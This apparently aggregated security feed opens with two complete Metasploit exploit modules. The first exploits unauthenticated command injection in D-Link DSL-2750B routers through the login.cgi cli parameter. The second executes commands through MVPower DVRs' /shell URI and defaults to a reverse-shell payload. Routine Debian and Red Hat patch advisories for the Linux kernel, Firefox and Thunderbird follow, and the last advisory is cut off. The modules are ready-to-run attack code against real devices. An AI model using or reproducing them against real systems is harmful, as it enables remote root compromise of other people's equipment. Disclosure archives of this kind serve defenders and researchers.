D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'D-Link DSL-2750B OS Command Injection',
          'Description'    => %q(
            This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
            Vulnerability can be exploited through "cli" parameter that is directly used to invoke
            "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
          ),
          'Author'         =>
            [
              'p@ql', # vulnerability discovery
              'Marcin Bury <marcin[at]threat9.com>' # metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['PACKETSTORM', 135706],
              ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
              ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
            ],
          'Targets'        =>
            [
              [
                'Linux mipsbe Payload',
                {
                  'Arch' => ARCH_MIPSBE,
                  'Platform' => 'linux'
                }
              ],
              [
                'Linux mipsel Payload',
                {
                  'Arch' => ARCH_MIPSLE,
                  'Platform' => 'linux'
                }
              ]
            ],
          'DisclosureDate'  => 'Feb 5 2016',
          'DefaultTarget'   => 0))
    
        deregister_options('CMDSTAGER::FLAVOR')
      end
    
      def check
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/ayefeaturesconvert.js'
        )
    
        unless res
          vprint_error('Connection failed')
          return CheckCode::Unknown
        end
    
        unless res.code.to_i == 200 && res.body.include?('DSL-2750')
          vprint_status('Remote host is not a DSL-2750')
          return CheckCode::Safe
        end
    
        if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
          version = Regexp.last_match[1]
          vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
          if version >= "1.01" && version <= "1.03"
            return Exploit::CheckCode::Appears
          end
        end
    
        CheckCode::Safe
      rescue ::Rex::ConnectionError
        vprint_error('Connection failed')
        return CheckCode::Unknown
      end
    
      def execute_command(cmd, _opts)
        payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
        send_request_cgi(
          {
            'method' => 'GET',
            'uri' => '/login.cgi',
            'vars_get' => {
              'cli' => "#{payload}$"
            },
            'encode_params' => false
          },
          5
        )
      rescue ::Rex::ConnectionError
        fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
      end
    
      def exploit
        print_status("#{peer} Checking target version...")
    
        unless check == Exploit::CheckCode::Appears
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
        end
    
        execute_cmdstager(
          flavor: :wget,
          linemax: 200
        )
      end
    end

CVE-2016-20017: Offensive Security’s Exploit Database Archive

MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE, contain a web shell that is accessible via a /shell URI. A remote unauthenticated attacker can execute arbitrary operating system commands as root. This vulnerability has also been referred to as the "JAWS webserver RCE" because of the easily identifying HTTP response server field. Other firmware versions, at least from 2014 through 2019, can be affected. This was exploited in the wild in 2017 through 2022.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
    
      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
          'Description' => %q{
            This module exploits an unauthenticated remote command execution
            vulnerability in MVPower digital video recorders. The 'shell' file
            on the web interface executes arbitrary operating system commands in
            the query string.
    
            This module was tested successfully on a MVPower model TV-7104HE with
            firmware version 1.8.4 115215B9 (Build 2014/11/17).
    
            The TV-7108HE model is also reportedly affected, but untested.
          },
          'Author'      =>
            [
              'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
              'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
              'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
            ],
          'License'     => MSF_LICENSE,
          'Platform'    => 'linux',
          'References'  =>
            [
              # Comment from Paul Davies contains probably the first published PoC
              [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
              # Writeup with PoC by Andrew Tierney from Pen Test Partners
              [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
            ],
          'DisclosureDate' => 'Aug 23 2015',
          'Privileged'     => true, # BusyBox
          'Arch'           => ARCH_ARMLE,
          'DefaultOptions' =>
            {
              'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
              'CMDSTAGER::FLAVOR' => 'wget'
            },
          'Targets'        =>
            [
              ['Automatic', {}]
            ],
          'CmdStagerFlavor' => %w{ echo printf wget },
          'DefaultTarget'   => 0))
      end
    
      def check
        begin
          fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
          res = send_request_cgi(
            'uri' => "/shell?echo+#{fingerprint}",
            'headers' => { 'Connection' => 'Keep-Alive' }
          )
          if res && res.body.include?(fingerprint)
            return CheckCode::Vulnerable
          end
        rescue ::Rex::ConnectionError
          return CheckCode::Unknown
        end
        CheckCode::Safe
      end
    
      def execute_command(cmd, opts)
        begin
          send_request_cgi(
            'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
            'headers' => { 'Connection' => 'Keep-Alive' }
          )
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
        end
      end
    
      def exploit
        print_status("#{peer} - Connecting to target")
    
        unless check == CheckCode::Vulnerable
          fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
        end
    
        print_good("#{peer} - Target is vulnerable!")
    
        execute_cmdstager(linemax: 1500)
      end
    end

CVE-2016-20016: Offensive Security’s Exploit Database Archive

Debian Linux Security Advisory 5257-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5257-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 18, 2022                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2021-4037 CVE-2022-0171 CVE-2022-1184 CVE-2022-2602  
                 CVE-2022-2663 CVE-2022-3061 CVE-2022-3176 CVE-2022-3303  
                 CVE-2022-20421 CVE-2022-39188 CVE-2022-39842 CVE-2022-40307  
                 CVE-2022-41674 CVE-2022-42719 CVE-2022-42720 CVE-2022-42721  
                 CVE-2022-42722

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2021-4037

    Christian Brauner reported that the inode_init_owner function for  
    the XFS filesystem in the Linux kernel allows local users to create  
    files with an unintended group ownership allowing attackers to  
    escalate privileges by making a plain file executable and SGID.

CVE-2022-0171

    Mingwei Zhang reported that a cache incoherence issue in the SEV API  
    in the KVM subsystem may result in denial of service.

CVE-2022-1184

    A flaw was discovered in the ext4 filesystem driver which can lead  
    to a use-after-free. A local user permitted to mount arbitrary  
    filesystems could exploit this to cause a denial of service (crash  
    or memory corruption) or possibly for privilege escalation.

CVE-2022-2602

    A race between handling an io_uring request and the Unix socket  
    garbage collector was discovered. An attacker can take advantage of  
    this flaw for local privilege escalation.

CVE-2022-2663

    David Leadbeater reported flaws in the nf_conntrack_irc  
    connection-tracking protocol module.  When this module is enabled  
    on a firewall, an external user on the same IRC network as an  
    internal user could exploit its lax parsing to open arbitrary TCP  
    ports in the firewall, to reveal their public IP address, or to  
    block their IRC connection at the firewall.

CVE-2022-3061

    A flaw was discovered in the i740 driver which may result in denial  
    of service.

    This driver is not enabled in Debian's official kernel  
    configurations.

CVE-2022-3176

    A use-after-free flaw was discovered in the io_uring subsystem which  
    may result in local privilege escalation to root.

CVE-2022-3303

    A race condition in the snd_pcm_oss_sync function in the sound  
    subsystem in the Linux kernel due to improper locking may result in  
    denial of service.

CVE-2022-20421

    A use-after-free vulnerability was discovered in the  
    binder_inc_ref_for_node function in the Android binder driver. On  
    systems where the binder driver is loaded, a local user could  
    exploit this for privilege escalation.

CVE-2022-39188

    Jann Horn reported a race condition in the kernel's handling of  
    unmapping of certain memory ranges.  When a driver created a  
    memory mapping with the VM_PFNMAP flag, which many GPU drivers do,  
    the memory mapping could be removed and freed before it was  
    flushed from the CPU TLBs.  This could result in a page use-after-  
    free.  A local user with access to such a device could exploit  
    this to cause a denial of service (crash or memory corruption) or  
    possibly for privilege escalation.

CVE-2022-39842

    An integer overflow was discovered in the pxa3xx-gcu video driver  
    which could lead to a heap out-of-bounds write.

    This driver is not enabled in Debian's official kernel  
    configurations.

CVE-2022-40307

    A race condition was discovered in the EFI capsule-loader driver,  
    which could lead to use-after-free.  A local user permitted to  
    access this device (/dev/efi_capsule_loader) could exploit this to  
    cause a denial of service (crash or memory corruption) or possibly  
    for privilege escalation.  However, this device is normally only  
    accessible by the root user.

CVE-2022-41674, CVE-2022-42719, CVE-2022-42720, CVE-2022-42721, CVE-2022-42722

    Soenke Huster discovered several vulnerabilities in the mac80211  
    subsystem triggered by WLAN frames which may result in denial of  
    service or the execution or arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 5.10.149-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNPFS5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q8oBAAh2sxVENkXNYsl1xX4jU6yCJ/vLuG8HklJE+cChdxFSwjrz5fE9Y36viE  
4M08WedXuAuSRKT9pCvPvvv+YNdjUaTIMHHLxCbWmWPfPboz6GRqk0RFEKABZe1t  
M5W9CqEYgp9LRTPyOYFoOpMSnWQ1a3XyhLHSl2hUX9bw1GC5ovCKpUNoZ+FE0v90  
v9uqM+8zdXmxe1tbAmjndCYzOoT9vaqqlU5OAaWQpqozRsa8Rv6/XiJ6mMVk8DUU  
QFLoGVqoIeWRc6CYSzzNeAVOX8v4vScILk/FW1HW/WfhrqCFBwEORo4jz/2o49HN  
4h/HxGlWtj/yiCUvRMR6RkQGJJOEr9vQa8Boe9z5rLzCQAPDZplp9iSu1/sdSqtV  
C1wJNaTfB8di1vwEUAra/bHTty7rUwc0rPBTmKFxwnPW0IOyX4Nsb4lSsbSRtnHm  
+80T8+WFWT0CMKpwOkP4GzwlZ9h7MeAKHwZpyyHc+84IS4RKl0SDkaHY/aOQ9pYB  
vrl2CV+hSxw/YzpeF9w56LQ6YWzO27NmUid0nw+YFcSc0D35hvsFo+AsQ4Kkdc4p  
94SkSq7zuhtdZDh1D5ZtBDfryxG2xWzgAEKcCyNTHW19iZO50K+YHzLbWzom9J6h  
hI8jM/zBEGvZD8EdM3Vc710+QF6Yie1zOLNDRxNj0Zfu+0k1uXo=gJNm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5257-1

Red Hat Security Advisory 2022-7023-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:7023-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7023  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.3.0-4.el8_6.src.rpm

aarch64:  
thunderbird-102.3.0-4.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.3.0-4.el8_6.aarch64.rpm  
thunderbird-debugsource-102.3.0-4.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-4.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-4.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.3.0-4.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.3.0-4.el8_6.s390x.rpm  
thunderbird-debuginfo-102.3.0-4.el8_6.s390x.rpm  
thunderbird-debugsource-102.3.0-4.el8_6.s390x.rpm

x86_64:  
thunderbird-102.3.0-4.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.3.0-4.el8_6.x86_64.rpm  
thunderbird-debugsource-102.3.0-4.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TL9zjgjWX9erEAQjHJRAAl5/xCh34VSE88oaLhkOh03fY6bsnze2Q  
LZ5b/Ry/Ogy5Zyw3dGw43c3ZfvOWBwpxZ/L1Blzp6ST1i+sMCQ1ZxC9SslNurz30  
37hE2fKr9JuZLTUzbEfD+6aXzGLe+1oF6wojrV6kwwOD0fkV9McphcFGyhd4vNV6  
ZAUQN/CBB6ZHHNc7xdFBmSinixyrWg+VC5tspQ+e0mxUIhDsByOSI+Qnty4BzSA9  
dEGpFkllK2i6O9m49XGsTMTg/wE20ogabj9reXI62Z3bl5PjHI6N1E5PGuyLzFOk  
LGynGbtyi4sXIMkNpwpL9IpZS5WbGoczscap1MIUTEyo+d4cYbUW0fCypTcBW5qn  
8THiD/EmLz11gH+LImHjUfetFIR7Ch7uHAgdRInCfNGcviHDpDL3M4p7emjVZGVn  
5ATUA8aUPzxIX3z1KrHOjYiZK2PFQTJTviIEDm5NqegggW6ha3CPGaRVx/8WzeQf  
+mf1HmTpxvAAeG35u570296j3xqWzF/syH0MJaciexHXYXAsAjQ2p7Anh8H4IGB0  
k1k7vbYz/GvYiia6N3rd29tZ8OWg+6fQYvQaY35S3GTIvnPWr9zAdfl3z00JBao3  
G1b1l96uPC1A+AOIlYZcVpqQfQZBxyeND3lqk+q3e7uCt8OAJXeUCS3gDa4VzT0b  
7j8ArylJ4tA=qx6b  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7023-01

Red Hat Security Advisory 2022-7019-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7019-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7019  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.3.0-7.el8_1.src.rpm

ppc64le:  
firefox-102.3.0-7.el8_1.ppc64le.rpm  
firefox-debuginfo-102.3.0-7.el8_1.ppc64le.rpm  
firefox-debugsource-102.3.0-7.el8_1.ppc64le.rpm

x86_64:  
firefox-102.3.0-7.el8_1.x86_64.rpm  
firefox-debuginfo-102.3.0-7.el8_1.x86_64.rpm  
firefox-debugsource-102.3.0-7.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TA9zjgjWX9erEAQjD8A//aKMsXSiE1aPdlAJpSgSHlZKDmwyWja9m  
s1WQyAqdj1B6Nftj7tAGzXpdMSzirRDim/OsWdWdGD/PTn/2XA9m79+Jw1LFD7bb  
Jna79P/QOBJRHaeAU5O6pstH+Z7+FQ+w+0cJX/auN6TO1zhNsz0cSAtQBALfBCtj  
Pnx1D5igDXIhA3KPjL2G6U1EQ48HfeW2k50XULsSDlrYLX/39YvKg+rNehh1lo7d  
Q1zwT3Z1XHlv2Rbs6blez5EuJEsts2w4rsiMU3pk7KnD/TR/LawPl3sGWgUHBVYr  
fKQwcB+WJWoZEzEh09MgJsuH50wKfIauNjI/1jKgRMFUcM/4EJ8EP3S3bU3NNPOc  
D1aPvod1xiWbbS8ktxUQ3cVQmOoBB+pQAkvp8qontcOOgte8BjwaXauohXvesd5t  
iwZS3OBIoWH+PE9u2SqevU92LlRK+MY5aQMYzuSf9IKi7fK1QymJvg4MQ4y96DFh  
47p9WkPaigExDLk+iwcA+KFjSDEwL7hlDwytT49h/1xy5hOSMo2hbPzmNrhpEiOD  
a0QEYVLGDR2KWp5A9OZCCIL5zW1XQE03TITCX4ZXcugvRnZf8ImtA1nZK+I9hwH0  
9w7Hphljkla8l2mowsj+sNth2p5R6NfPLvS1uWUahYQZIHLkIkgX5YP51lo/p+D6  
5N1k4Rw97H8=amPq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7019-01

Red Hat Security Advisory 2022-7020-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7020-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7020  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.3.0-7.el9_0.src.rpm

aarch64:  
firefox-102.3.0-7.el9_0.aarch64.rpm  
firefox-debuginfo-102.3.0-7.el9_0.aarch64.rpm  
firefox-debugsource-102.3.0-7.el9_0.aarch64.rpm

ppc64le:  
firefox-102.3.0-7.el9_0.ppc64le.rpm  
firefox-debuginfo-102.3.0-7.el9_0.ppc64le.rpm  
firefox-debugsource-102.3.0-7.el9_0.ppc64le.rpm

s390x:  
firefox-102.3.0-7.el9_0.s390x.rpm  
firefox-debuginfo-102.3.0-7.el9_0.s390x.rpm  
firefox-debugsource-102.3.0-7.el9_0.s390x.rpm

x86_64:  
firefox-102.3.0-7.el9_0.x86_64.rpm  
firefox-debuginfo-102.3.0-7.el9_0.x86_64.rpm  
firefox-debugsource-102.3.0-7.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08TOtzjgjWX9erEAQhbrQ//eGfpfVEIx6Srj3T7RZqukl589ujYYn6v  
mBvHuTG8Id6QrbJv5Rz+eE4guLQhrWmYPD2T0+6W7hoxMqn2rcODlyxhPH4ch3KN  
tmMkctfMps2l4uyrDwPl+r+120pTBNt0c/lQXgQMj7TFDjjttN/70YNIlUPw5iqN  
i0crNIvxb9AhotwYBS7dasUsCayfeLdZTR+7Ss8IMApBjzDBKFKz6c2Blb2GlSob  
CRdDCYZE+e6SHZ4iAFyzP4VKV2MB+ZPCzNxMXziNTcOBBx60yeVegjzv5hOIyEEi  
JhEGrJhCqaisBZAxgVKxRHugYcunWoemiVrSA9Wai6csGp0PiOE1HnFje1mCx5r1  
AuVmi07pwQf76cyh5Smu4IknlPosEyVtUlD4cxmr+vo0ScBqqqIPpuxa7QEG/cKV  
qCrQy0FgI8WvJ3X1deElT1XKFw9t2Hlr7K1QnZ+o9tBO8Ldc8wEGjDlCD9FWuARC  
09K4bvy1ZgLbIpXDr3v2oWLo4dzFmziqp/2Gvtnf+2FW/oKM41YBFLmICtFeOmoe  
uR9Ov0hmGz3GbXN8sXZgxFZ7tDYP/qhL7ho+QBY0JgYHkVG7ehlfeC4D+fWgOwPw  
o1zblZTxUUjRoWkCtLZoDj9I8XsRnQFmuM6EE4sCLgyT/qa+u8NkrkgEFmmzvfqT  
IZQb2vgCZ6g=ReFl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7020-01

Red Hat Security Advisory 2022-7024-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7024-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7024  
Issue date:        2022-10-18  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.3.0-7.el8_6.src.rpm

aarch64:  
firefox-102.3.0-7.el8_6.aarch64.rpm  
firefox-debuginfo-102.3.0-7.el8_6.aarch64.rpm  
firefox-debugsource-102.3.0-7.el8_6.aarch64.rpm

ppc64le:  
firefox-102.3.0-7.el8_6.ppc64le.rpm  
firefox-debuginfo-102.3.0-7.el8_6.ppc64le.rpm  
firefox-debugsource-102.3.0-7.el8_6.ppc64le.rpm

s390x:  
firefox-102.3.0-7.el8_6.s390x.rpm  
firefox-debuginfo-102.3.0-7.el8_6.s390x.rpm  
firefox-debugsource-102.3.0-7.el8_6.s390x.rpm

x86_64:  
firefox-102.3.0-7.el8_6.x86_64.rpm  
firefox-debuginfo-102.3.0-7.el8_6.x86_64.rpm  
firefox-debugsource-102.3.0-7.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY08THNzjgjWX9erEAQjH4g//YbAuWjQ31CF4NzJgyAPnLHHz3hKlQjme  
xjHF1/GeKYVMF5/ItukGqggvv8aZVMKJhUsH9yaDjyFHVA8A0h8txI4oAO7nldSm  
KJxRvVCJ/82Qs0gKN5NDF23M8nGFK57kDBflhCAfVT0aUfDH4sEgdrumweI9gr/x  
eORvnVJ3HDzupxe9FJ6f+6lr/M5CwF1qrae1CdrfRy3KCn8kc/bf7sar63ih+6BR  
2W0ZLCtFcXy55yoUEzfHq3qP3QeACBtoYuDDh0+4CPJlar3LlGYiHd166sqo+tep  
7w08HrY146+gHzN5FYY5lBRcnNZVJqvHMfbVrA5CgYF9j9sRyoxqbqeffvKu4WCF  
U5cfEcOagy4l0FfJRmfKausMCA5DVtanSaz6ZaJbk6itIpcG7q5NCcC7XdqBQjUd  
FFzflh5S7Y/aKJvR/xmJwrbUTAhVYMdkhPYJYZN+u6tnE2EDsP11azP9rTBS+3Gw  
MzUiSOsq31rdbZunGtEz7itJwpxt0W+TNNC21qzFPS+QuGPHr3qDI6/ABmITaSzG  
Z+hPFv9dR+Wzfwmpi8mj40yeEvWsDPv19MoX/4ifutGcn3rB/y1637sU0TtSw7or  
K+BEq6fLalJRMumlqfHEFnSotg3DNq67j8t26atKxq/q+C4LhS5I8uLL6FfcVSyf  
ieoJ8AMyLKs=6TmU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7024-01

Red Hat Security Advisory 2022-7026-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:7026-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7026  
Issue date:        2022-10-18  
